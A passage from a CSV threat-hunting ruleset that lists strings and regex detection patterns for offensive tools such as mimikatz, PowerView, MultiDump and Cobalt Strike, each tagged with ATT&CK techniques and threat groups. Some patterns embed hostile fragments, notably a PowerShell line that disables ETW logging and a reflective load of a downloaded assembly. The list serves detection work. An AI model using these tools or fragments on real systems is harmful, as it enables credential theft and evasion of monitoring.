Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","13455" "*[experimental] patch Terminal Server service to allow multiples users*",".{0,1000}\[experimental\]\spatch\sTerminal\sServer\sservice\sto\sallow\smultiples\susers.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz strings","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - 
T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","13456" "*[experimental] Try to enumerate all modules with Detours-like hooks*",".{0,1000}\[experimental\]\sTry\sto\senumerate\sall\smodules\swith\sDetours\-like\shooks.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz strings","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - 
TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","13457" "*[experimental] try to get passwords from mstsc process*",".{0,1000}\[experimental\]\stry\sto\sget\spasswords\sfrom\smstsc\sprocess.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz strings","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","13458" "*[experimental] try to get passwords from running sessions*",".{0,1000}\[experimental\]\stry\sto\sget\spasswords\sfrom\srunning\ssessions.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz strings","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 
- T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","13459" "*[Find-DomainShare] Enumerating server *",".{0,1000}\[Find\-DomainShare\]\sEnumerating\sserver\s.{0,1000}","offensive_tool_keyword","powerview","PowerView is a PowerShell tool to gain network situational awareness on Windows domains","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","Dispossessor - MAZE - Conti - XingLocker - Rhysida - BlackByte - Black Basta - MUSTANG PANDA","Discovery","https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1","1","0","#content","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","13460" "*[Find-DomainUserLocation] Stealth enumeration *",".{0,1000}\[Find\-DomainUserLocation\]\sStealth\senumeration\s.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black 
Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","13461" "*[Find-InterestingDomainShareFile] Enumerating server*",".{0,1000}\[Find\-InterestingDomainShareFile\]\sEnumerating\sserver.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","13462" "*[Get-DomainGPOUserLocalGroupMapping] Enumerating nested group memberships for*",".{0,1000}\[Get\-DomainGPOUserLocalGroupMapping\]\sEnumerating\snested\sgroup\smemberships\sfor.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","13465" "*[GPP] Searching for passwords now*",".{0,1000}\[GPP\]\sSearching\sfor\spasswords\snow.{0,1000}","offensive_tool_keyword","ADPassHunt","credential stealer tool that hunts Active Directory credentials (leaked tool Developed In-house for Fireeyes Red Team)","T1003.003 - T1552.006","TA0006 - TA0007","N/A","N/A","Credential Access","https://www.virustotal.com/gui/file/73233ca7230fb5848e220723caa06d795a14c0f1f42c6a59482e812bfb8c217f","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","13466" "*[i] [HELL HALL] Press To Run ... 
*",".{0,1000}\[i\]\s\[HELL\sHALL\]\sPress\s\\sTo\sRun\s\.\.\.\s.{0,1000}","offensive_tool_keyword","HellsHall","Performing Indirect Clean Syscalls","T1106","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Maldev-Academy/HellHall","1","0","N/A","N/A","8","6","535","71","2023-04-19T06:10:47Z","2023-01-03T04:43:05Z","13467" "*[i] AAD Join:*enumerate*",".{0,1000}\[i\]\sAAD\sJoin\:.{0,1000}enumerate.{0,1000}","offensive_tool_keyword","SharpAzbelt","This is an attempt to port Azbelt by Leron Gray from Nim to C#. It can be used to enumerate and pilfer Azure-related credentials from Windows boxes and Azure IaaS resources","T1082 - T1003 - T1027 - T1110 - T1078","TA0006 - TA0007 - TA0005 - TA0004 - TA0003","N/A","N/A","Discovery","https://github.com/redskal/SharpAzbelt","1","0","#content","N/A","8","1","26","7","2023-09-21T21:47:32Z","2023-09-21T21:44:03Z","13468" "*[i] Argument Spoofed.*",".{0,1000}\[i\]\sArgument\sSpoofed\..{0,1000}","offensive_tool_keyword","NoArgs","NoArgs is a tool designed to dynamically spoof and conceal process arguments while staying undetected. It achieves this by hooking into Windows APIs to dynamically manipulate the Windows internals on the go. 
This allows NoArgs to alter process arguments discreetly.","T1055 - T1574 - T1112 - T1056","TA0005 - TA0040 - TA0009","N/A","N/A","Defense Evasion","https://github.com/oh-az/NoArgs","1","0","N/A","N/A","8","2","151","25","2024-05-07T20:38:34Z","2024-03-15T16:54:49Z","13469" "*[i] Checking for insecure trustee/resource delegations*",".{0,1000}\[i\]\sChecking\sfor\sinsecure\strustee\/resource\sdelegations.{0,1000}","offensive_tool_keyword","Adeleginator","tool that uses ADeleg to find insecure trustee and resource delegations in Active Directory","T1087 - T1136 - T1069","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/techspence/Adeleginator","1","0","N/A","N/A","6","2","179","18","2024-09-18T20:21:42Z","2024-03-04T03:44:52Z","13470" "*[i] Credman:*Credential Blob Decrypted*",".{0,1000}\[i\]\sCredman\:.{0,1000}Credential\sBlob\sDecrypted.{0,1000}","offensive_tool_keyword","SharpAzbelt","This is an attempt to port Azbelt by Leron Gray from Nim to C#. It can be used to enumerate and pilfer Azure-related credentials from Windows boxes and Azure IaaS resources","T1082 - T1003 - T1027 - T1110 - T1078","TA0006 - TA0007 - TA0005 - TA0004 - TA0003","N/A","N/A","Discovery","https://github.com/redskal/SharpAzbelt","1","0","#content","N/A","8","1","26","7","2023-09-21T21:47:32Z","2023-09-21T21:44:03Z","13471" "*[i] Dumping LSASS Using *",".{0,1000}\[i\]\sDumping\sLSASS\sUsing\s.{0,1000}","offensive_tool_keyword","DumpLSASS","Lsass dumping tool - 50 ways of dumping lsass","T1003.001 - T1055.001 - T1620","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/elementalsouls/DumpLSASS","1","0","#content","N/A","10","1","33","5","2024-02-27T11:25:11Z","2023-04-09T12:11:10Z","13472" "*[i] Dumping LSASS Using comsvcs.dll*",".{0,1000}\[i\]\sDumping\sLSASS\sUsing\scomsvcs\.dll.{0,1000}","offensive_tool_keyword","MultiDump","MultiDump is a post-exploitation tool for dumping and extracting LSASS memory discreetly","T1003 - T1564.002","TA0005 - 
TA0006","N/A","N/A","Credential Access","https://github.com/Xre0uS/MultiDump","1","0","N/A","N/A","10","6","510","66","2025-03-28T10:40:27Z","2024-02-02T05:56:29Z","13473" "*[i] Dumping LSASS Using ProcDump*",".{0,1000}\[i\]\sDumping\sLSASS\sUsing\sProcDump.{0,1000}","offensive_tool_keyword","MultiDump","MultiDump is a post-exploitation tool for dumping and extracting LSASS memory discreetly","T1003 - T1564.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/Xre0uS/MultiDump","1","0","N/A","N/A","10","6","510","66","2025-03-28T10:40:27Z","2024-02-02T05:56:29Z","13474" "*[i] Hooked Ntdll Base Address : *",".{0,1000}\[i\]\sHooked\sNtdll\sBase\sAddress\s\:\s.{0,1000}","offensive_tool_keyword","Fuck-Etw","Bypass the Event Trace Windows(ETW) and unhook ntdll.","T1070.004 - T1055.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/unkvolism/Fuck-Etw","1","0","N/A","N/A","10","2","102","13","2023-09-29T21:19:10Z","2023-09-25T18:59:10Z","13475" "*[i] Parsing for Defender Exclusions*",".{0,1000}\[i\]\sParsing\sfor\sDefender\sExclusions.{0,1000}","offensive_tool_keyword","MDExclusionParser","PowerShell script to quickly scan Event Log ID 5007 and 1121 for published Windows Defender Exclusions and Attack Surface Reduction (ASR) rule configuration.","T1562.001","TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/ViziosDe/MDExclusionParser","1","0","#content","N/A","5","1","6","1","2024-06-12T14:17:08Z","2024-06-12T11:56:07Z","13476" "*[i] Running ADeleg and creating *",".{0,1000}\[i\]\sRunning\sADeleg\sand\screating\s.{0,1000}","offensive_tool_keyword","Adeleginator","tool that uses ADeleg to find insecure trustee and resource delegations in Active Directory","T1087 - T1136 - T1069","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/techspence/Adeleginator","1","0","N/A","N/A","6","2","179","18","2024-09-18T20:21:42Z","2024-03-04T03:44:52Z","13477" "*[i] Sending Encrypted SAM 
Save*",".{0,1000}\[i\]\sSending\sEncrypted\sSAM\sSave.{0,1000}","offensive_tool_keyword","MultiDump","MultiDump is a post-exploitation tool for dumping and extracting LSASS memory discreetly","T1003 - T1564.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/Xre0uS/MultiDump","1","0","N/A","N/A","10","6","510","66","2025-03-28T10:40:27Z","2024-02-02T05:56:29Z","13478" "*[i] Unhooked Ntdll Base Address: *",".{0,1000}\[i\]\sUnhooked\sNtdll\sBase\sAddress\:\s.{0,1000}","offensive_tool_keyword","Fuck-Etw","Bypass the Event Trace Windows(ETW) and unhook ntdll.","T1070.004 - T1055.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/unkvolism/Fuck-Etw","1","0","N/A","N/A","10","2","102","13","2023-09-29T21:19:10Z","2023-09-25T18:59:10Z","13479" "*[Invoke-RevertToSelf] Token impersonation successfully reverted*",".{0,1000}\[Invoke\-RevertToSelf\]\sToken\simpersonation\ssuccessfully\sreverted.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","13481" "*[Invoke-UserImpersonation] Alternate credentials successfully impersonated*",".{0,1000}\[Invoke\-UserImpersonation\]\sAlternate\scredentials\ssuccessfully\simpersonated.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","13482" 
"*[IO.File]::ReadAllText(*stubps1tovbs.ps1*",".{0,1000}\[IO\.File\]\:\:ReadAllText\(.{0,1000}stubps1tovbs\.ps1.{0,1000}","offensive_tool_keyword","GlllPowerloader","Sample to bypass AV/EDR and upload to transfer.sh","T1059.001 - T1202 - T1105 - T1027 - T1036 - T1070 - T1031 - T1071 - T1048","TA0005 - TA0004 - TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/INotGreen/GlllPowerloader","1","0","N/A","N/A","10","5","451","105","2024-04-12T07:28:24Z","2022-04-26T12:10:58Z","13483" "*[IO.File]::WriteAllBytes(""*.kirbi**",".{0,1000}\[IO\.File\]\:\:WriteAllBytes\(\"".{0,1000}\.kirbi.{0,1000}.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#content","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","13484" "*[KeeFarceDLL]*",".{0,1000}\[KeeFarceDLL\].{0,1000}","offensive_tool_keyword","KeeFarce","Extracts passwords from a KeePass 2.x database directly from memory","T1003 - T1055 - T1059","TA0006 ","N/A","N/A","Credential Access","https://github.com/denandz/KeeFarce","1","0","N/A","N/A","10","10","1009","132","2015-11-17T04:12:25Z","2015-10-27T05:29:04Z","13486" "*[LOLSpoof] > *",".{0,1000}\[LOLSpoof\]\s\>\s.{0,1000}","offensive_tool_keyword","LOLSpoof","An interactive shell to spoof some LOLBins command line","T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/itaymigdal/LOLSpoof","1","0","N/A","N/A","8","2","184","24","2024-01-27T05:43:59Z","2024-01-16T20:15:38Z","13487" "*[MetasploitCoop-Backend]*",".{0,1000}\[MetasploitCoop\-Backend\].{0,1000}","offensive_tool_keyword","MetasploitCoop","Post-exploitation collaboration platform based 
on MSF","T1105 - T1098 - T1104 - T1136","TA0010 - TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x727/MetasploitCoop_0x727","1","0","N/A","N/A","10","10","217","38","2021-08-17T15:24:50Z","2021-08-17T10:37:44Z","13490" "*[MetasploitCoop-Frontend]*",".{0,1000}\[MetasploitCoop\-Frontend\].{0,1000}","offensive_tool_keyword","MetasploitCoop","Post-exploitation collaboration platform based on MSF","T1105 - T1098 - T1104 - T1136","TA0010 - TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x727/MetasploitCoop_0x727","1","0","N/A","N/A","10","10","217","38","2021-08-17T15:24:50Z","2021-08-17T10:37:44Z","13491" "*[Ngrok Tunnel URL*",".{0,1000}\[Ngrok\sTunnel\sURL.{0,1000}","offensive_tool_keyword","peeping-tom","Remote keylogger for Windows written in C++","T1056.001 - T1123 - T1129 - T1113","TA0006 - TA0008 - TA0009","N/A","Dispossessor","Collection","https://github.com/shehzade/peeping-tom","1","0","#content","keylogger","10","1","3","0","2022-07-24T09:31:59Z","2022-04-15T14:16:41Z","13492" "*[o365spray]*",".{0,1000}\[o365spray\].{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","0","N/A","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","13493" "*[PEzor] cleanup complete*",".{0,1000}\[PEzor\]\scleanup\scomplete.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","0","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","13495" "*[PEzor] payload freed*",".{0,1000}\[PEzor\]\spayload\sfreed.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - 
TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","0","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","13496" "*[PEzor] starting BOF*",".{0,1000}\[PEzor\]\sstarting\sBOF.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","0","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","13497" "*[PRIVESC] Giving token full privileges for PID*",".{0,1000}\[PRIVESC\]\sGiving\stoken\sfull\sprivileges\sfor\sPID.{0,1000}","offensive_tool_keyword","Sunder","Windows rootkit designed to work with BYOVD exploits","T1543.003 - T1562.001 - T1547.001 - T1068 - T1548.002","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/ColeHouston/Sunder","1","0","#content","N/A","10","2","183","20","2025-01-18T10:41:50Z","2025-01-10T03:57:05Z","13499" "*[PRIVESC] Stealing token from PID *",".{0,1000}\[PRIVESC\]\sStealing\stoken\sfrom\sPID\s.{0,1000}","offensive_tool_keyword","Sunder","Windows rootkit designed to work with BYOVD exploits","T1543.003 - T1562.001 - T1547.001 - T1068 - T1548.002","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/ColeHouston/Sunder","1","0","#content","N/A","10","2","183","20","2025-01-18T10:41:50Z","2025-01-10T03:57:05Z","13500" "*[Reflection.Assembly]::Load(*[Char](*)+[Char](*)+*+[Char](*)*",".{0,1000}\[Reflection\.Assembly\]\:\:Load\(.{0,1000}\[Char\]\(.{0,1000}\)\+\[Char\]\(.{0,1000}\)\+.{0,1000}\+\[Char\]\(.{0,1000}\).{0,1000}","offensive_tool_keyword","NLBrute","RDP Bruteforcer","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/amazond/NLBrute-1.2","1","0","N/A","powershell scriptblock","10","1","1","2","2023-12-21T12:25:54Z","2023-12-21T12:22:27Z","13501" 
"*[Reflection.Assembly]::LoadWithPartialName('System.Core').GetType('System.Diagnostics.Eventing.EventProvider').GetField('m_enabled'*'NonPublic*Instance').SetValue([Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider').GetField('etwProvider'*'NonPublic*Static').GetValue($null)*0)*",".{0,1000}\[Reflection\.Assembly\]\:\:LoadWithPartialName\(\'System\.Core\'\)\.GetType\(\'System\.Diagnostics\.Eventing\.EventProvider\'\)\.GetField\(\'m_enabled\'.{0,1000}\'NonPublic.{0,1000}Instance\'\)\.SetValue\(\[Ref\]\.Assembly\.GetType\(\'System\.Management\.Automation\.Tracing\.PSEtwLogProvider\'\)\.GetField\(\'etwProvider\'.{0,1000}\'NonPublic.{0,1000}Static\'\)\.GetValue\(\$null\).{0,1000}0\).{0,1000}","offensive_tool_keyword","powershell","impair the defenses of the targeted system by disabling ETW logging for PowerShell. This can make it difficult for security teams to monitor and analyze PowerShell activities on the system potentially allowing adversaries to perform malicious actions without being detected","T1562","TA0040","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","13502" "*[SharpDPAPI.Program]::Main(""machinemasterkeys"")*",".{0,1000}\[SharpDPAPI\.Program\]\:\:Main\(\""machinemasterkeys\""\).{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112 - T1649","TA0006 - TA0002","N/A","Conti","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","#content","N/A","10","10","1232","215","2024-06-27T13:39:08Z","2018-08-22T17:39:31Z","13503" "*['spawnto']*",".{0,1000}\[\'spawnto\'\].{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - 
T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","0","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","13504" "*[SQLC2 Agent Job]*",".{0,1000}\[SQLC2\sAgent\sJob\].{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. 
PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","0","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","13505" "*[START]: Password spraying attack!*",".{0,1000}\[START\]\:\sPassword\sspraying\sattack!.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","script content","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","13506" "*[STEALER] Bypass Finished*",".{0,1000}\[STEALER\]\sBypass\sFinished.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github[.]com/sap3r-encrypthub/encrypthub","1","0","N/A","N/A","10","7","N/A","N/A","N/A","N/A","13507" "*[string]$Class = ""PMEClass""*",".{0,1000}\[string\]\$Class\s\=\s\""PMEClass\"".{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. 
Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","13508" "*[System.Reflection.Assembly]::Load((Invoke-WebRequest *.exe*while ($true){Start-Sleep -s 1000}*",".{0,1000}\[System\.Reflection\.Assembly\]\:\:Load\(\(Invoke\-WebRequest\s.{0,1000}\.exe.{0,1000}while\s\(\$true\)\{Start\-Sleep\s\-s\s1000\}.{0,1000}","offensive_tool_keyword","CmdLineSpoofer","How to spoof the command line when spawning a new process from C#","T1055 - T1027 - T1036","TA0002 - TA0004 - TA0010","N/A","N/A","Defense Evasion","https://github.com/plackyhacker/CmdLineSpoofer","1","0","N/A","N/A","9","2","106","17","2021-12-28T18:56:25Z","2021-12-27T09:23:45Z","13513" "*[System.Text.Encoding]::Unicode.GetBytes(""[scriptblock]*$x={$CommandDoc};*$x.Invoke()*",".{0,1000}\[System\.Text\.Encoding\]\:\:Unicode\.GetBytes\(\""\[scriptblock\].{0,1000}\$x\=\{\$CommandDoc\}\;.{0,1000}\$x\.Invoke\(\).{0,1000}","offensive_tool_keyword","IPPrintC2","PoC for using MS Windows printers for persistence / command and control via Internet 